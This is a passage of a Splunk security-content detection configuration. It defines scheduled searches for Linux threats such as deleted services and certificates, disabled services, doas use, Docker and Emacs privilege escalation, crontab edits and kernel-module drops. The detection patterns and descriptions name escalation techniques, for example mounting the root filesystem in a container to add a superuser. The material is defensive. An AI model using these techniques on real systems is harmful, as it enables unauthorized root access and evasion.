attacker may delete or modify daemon script to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.notable.param.rule_title = Linux Deletion Of Init Daemon Script action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path IN ( "/etc/init.d/*") by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_deletion_of_init_daemon_script_filter` [ESCU - Linux Deletion Of Services - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a deletion of services in a linux machine. attacker may delete or modify services to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in a compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects the deletion of services on a Linux machine. An attacker may delete or modify services to impair security features or as defense evasion on a compromised Linux machine. This TTP can also be a good indicator of malware trying to wipe or delete several files on a compromised host as part of its destructive payload, as the AcidRain malware does on Linux or router machines. This detection is a good pivot to check which process and user tried to delete this type of file, which is not common and needs further investigation.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase.
action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Deletion Of Services - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["AwfulShred", "AcidRain", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = A services file $file_name$ deleted on host $dest$ by process GUID - $process_guid$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Deletion Of Services - Rule
action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "AcidRain", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects the deletion of services on a Linux machine. An attacker may delete or modify services to impair security features or as defense evasion on a compromised Linux machine. This TTP can also be a good indicator of malware trying to wipe or delete several files on a compromised host as part of its destructive payload, as the AcidRain malware does on Linux or router machines. This detection is a good pivot to check which process and user tried to delete this type of file, which is not common and needs further investigation.
action.notable.param.rule_title = Linux Deletion Of Services
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path IN ( "/etc/systemd/*", "*/lib/systemd/*", "*/run/systemd/*") Filesystem.file_path = "*.service" by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_deletion_of_services_filter`

[ESCU - Linux Deletion of SSL Certificate - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects the deletion of an SSL certificate on a Linux machine. An attacker may delete or modify SSL certificates to impair security features or as defense evasion on a compromised Linux machine. This anomaly can also be a good indicator of malware trying to wipe or delete several files on a compromised host as part of its destructive payload, as the AcidRain malware does on Linux or router machines. This detection is a good pivot to check which process and user tried to delete this type of file, which is not common and needs further investigation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects the deletion of an SSL certificate on a Linux machine. An attacker may delete or modify SSL certificates to impair security features or as defense evasion on a compromised Linux machine. This anomaly can also be a good indicator of malware trying to wipe or delete several files on a compromised host as part of its destructive payload, as the AcidRain malware does on Linux or router machines. This detection is a good pivot to check which process and user tried to delete this type of file, which is not common and needs further investigation.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase.
action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Deletion of SSL Certificate - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["AcidRain"]
action.risk = 1
action.risk.param._risk_message = SSL certificate deleted on host $dest$ by process GUID - $process_guid$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Deletion of SSL Certificate - Rule
action.correlationsearch.annotations = {"analytic_story": ["AcidRain"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path = "/etc/ssl/certs/*" Filesystem.file_path IN ("*.pem", "*.crt") by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_deletion_of_ssl_certificate_filter`

[ESCU - Linux Disable Services - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects events that attempt to disable a service. This is typically identified in parallel with other instances of service enumeration or attempts to stop a service and then delete it. Adversaries, for example the Industroyer2 malware, use this technique to terminate security services or other related services in order to continue their objective as a destructive payload.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects events that attempt to disable a service. This is typically identified in parallel with other instances of service enumeration or attempts to stop a service and then delete it. Adversaries, for example the Industroyer2 malware, use this technique to terminate security services or other related services in order to continue their objective as a destructive payload.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Disable Services - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["AwfulShred", "Data Destruction", "Industroyer2"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to disable services on endpoint $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Disable Services - Rule
action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects events that attempt to disable a service. This is typically identified in parallel with other instances of service enumeration or attempts to stop a service and then delete it. Adversaries, for example the Industroyer2 malware, use this technique to terminate security services or other related services in order to continue their objective as a destructive payload.
action.notable.param.rule_title = Linux Disable Services
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("systemctl", "service", "svcadm") Processes.process = "* disable*" by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_disable_services_filter`

[ESCU - Linux Doas Conf File Creation - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects the creation of the doas.conf file on a Linux host. This configuration file is used by the doas utility to allow or permit standard users to perform tasks as root, the same way sudo does. This tool was developed as a minimalistic alternative to sudo. It can be abused by adversaries, attackers or malware to gain elevated privileges on the targeted or compromised host. On the other hand, it can also be used by an administrator for a task that needs admin rights, in which case a filter is needed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects the creation of the doas.conf file on a Linux host. This configuration file is used by the doas utility to allow or permit standard users to perform tasks as root, the same way sudo does. This tool was developed as a minimalistic alternative to sudo. It can be abused by adversaries, attackers or malware to gain elevated privileges on the targeted or compromised host. On the other hand, it can also be used by an administrator for a task that needs admin rights, in which case a filter is needed.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase.
action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2022-01-05
action.escu.modification_date = 2022-01-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Doas Conf File Creation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Doas Conf File Creation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/etc/doas.conf") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_doas_conf_file_creation_filter`

[ESCU - Linux Doas Tool Execution - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does. This tool was developed as a minimalistic alternative to sudo. It can be abused by adversaries, attackers or malware to gain elevated privileges on the targeted or compromised host. On the other hand, it can also be executed by an administrator for a task that needs admin rights, in which case a filter is needed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does. This tool was developed as a minimalistic alternative to sudo. It can be abused by adversaries, attackers or malware to gain elevated privileges on the targeted or compromised host. On the other hand, it can also be executed by an administrator for a task that needs admin rights, in which case a filter is needed.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2022-01-05
action.escu.modification_date = 2022-01-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Doas Tool Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = A doas $process_name$ with commandline $process$ was executed on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Doas Tool Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "doas" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_doas_tool_execution_filter`

[ESCU - Linux Docker Privilege Escalation - Rule]
action.escu = 0
action.escu.enabled = 1
description = Docker is an open source containerization platform. It helps programmers bundle applications into containers, which are standardized executable units that include the application source code along with the OS libraries and dependencies needed to run that code in any setting. A user can mount the root directory into a container and edit the /etc/passwd file to add a superuser. This requires the user to be privileged enough to run Docker, i.e. being in the docker group or being root.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Docker is an open source containerization platform. It helps programmers bundle applications into containers, which are standardized executable units that include the application source code along with the OS libraries and dependencies needed to run that code in any setting. A user can mount the root directory into a container and edit the /etc/passwd file to add a superuser. This requires the user to be privileged enough to run Docker, i.e. being in the docker group or being root.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed.
action.escu.creation_date = 2022-07-31
action.escu.modification_date = 2022-07-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Docker Privilege Escalation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 5}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Docker Privilege Escalation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN("*docker*-v*/*:*","*docker*--volume*/*:*") OR Processes.process IN("*docker*exec*sh*","*docker*exec*bash*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_docker_privilege_escalation_filter`

[ESCU - Linux Edit Cron Table Parameter - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the suspicious editing of cron jobs in Linux via the crontab command-line parameter. This tactic could be used by adversaries or malware to schedule execution of their malicious code, potentially leading to system compromise or unauthorized persistent access. It pinpoints this activity by monitoring command-line executions involving 'crontab' and the edit parameter (-e).\
Recognizing such activity is vital for a SOC as cron job manipulations might signal unauthorized persistence attempts or scheduled malicious actions, potentially resulting in substantial harm. A true positive signifies an active threat, with implications ranging from unauthorized access to broader network compromise.\
To implement this analytic, logs capturing process name, parent process, and command-line executions from your endpoints must be ingested.\
Known false positives could stem from valid administrative tasks or automation processes using crontab. To reduce these, fine-tune the filter macros according to the benign activities within your environment. These adjustments ensure legitimate actions aren't mistaken for threats, allowing analysts to focus on genuine potential risks.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects the suspicious editing of cron jobs in Linux via the crontab command-line parameter. This tactic could be used by adversaries or malware to schedule execution of their malicious code, potentially leading to system compromise or unauthorized persistent access. It pinpoints this activity by monitoring command-line executions involving 'crontab' and the edit parameter (-e).\
Recognizing such activity is vital for a SOC as cron job manipulations might signal unauthorized persistence attempts or scheduled malicious actions, potentially resulting in substantial harm. A true positive signifies an active threat, with implications ranging from unauthorized access to broader network compromise.\
To implement this analytic, logs capturing process name, parent process, and command-line executions from your endpoints must be ingested.\
Known false positives could stem from valid administrative tasks or automation processes using crontab. To reduce these, fine-tune the filter macros according to the benign activities within your environment. These adjustments ensure legitimate actions aren't mistaken for threats, allowing analysts to focus on genuine potential risks.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2021-12-17
action.escu.modification_date = 2021-12-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Edit Cron Table Parameter - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Edit Cron Table Parameter - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = crontab Processes.process = "*crontab *" Processes.process = "* -e*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_edit_cron_table_parameter_filter`

[ESCU - Linux Emacs Privilege Escalation - Rule]
action.escu = 0
action.escu.enabled = 1
description = EMACS is a family of text editors characterized by their extensibility. The manual for the most widely used variant, GNU Emacs, describes it as "the extensible, customizable, self-documenting, real-time display editor". If a user is granted sudo rights to the EMACS tool, that user can run special commands as root and possibly get a root shell.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = EMACS is a family of text editors characterized by their extensibility. The manual for the most widely used variant, GNU Emacs, describes it as "the extensible, customizable, self-documenting, real-time display editor". If a user is granted sudo rights to the EMACS tool, that user can run special commands as root and possibly get a root shell.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present, filter as needed.
action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Emacs Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Emacs Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*emacs*" AND Processes.process="*--eval*" AND Processes.process="*sudo*" by Processes.dest Processes.user 
Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_emacs_privilege_escalation_filter` [ESCU - Linux File Created In Kernel Driver Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious file creation in the kernel/drivers directory on Linux hosts. This directory holds the kernel modules available on the system, so file creation there is a good indicator of a possible rootkit installation on the host. Adversaries, malware authors and red teamers abuse this technique to run their malicious code with the highest privileges, at kernel level. Although this event is uncommon, an administrator or a legitimate third-party tool may install a driver or Linux kernel module as part of its installation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.006", "T1547"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious file creation in the kernel/drivers directory on Linux hosts. This directory holds the kernel modules available on the system, so file creation there is a good indicator of a possible rootkit installation on the host. Adversaries, malware authors and red teamers abuse this technique to run their malicious code with the highest privileges, at kernel level. Although this event is uncommon, an administrator or a legitimate third-party tool may install a driver or Linux kernel module as part of its installation.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrators or network operators can create files in these folders for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-22 action.escu.modification_date = 2021-12-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux File Created In Kernel Driver Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Rootkit"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux File Created In 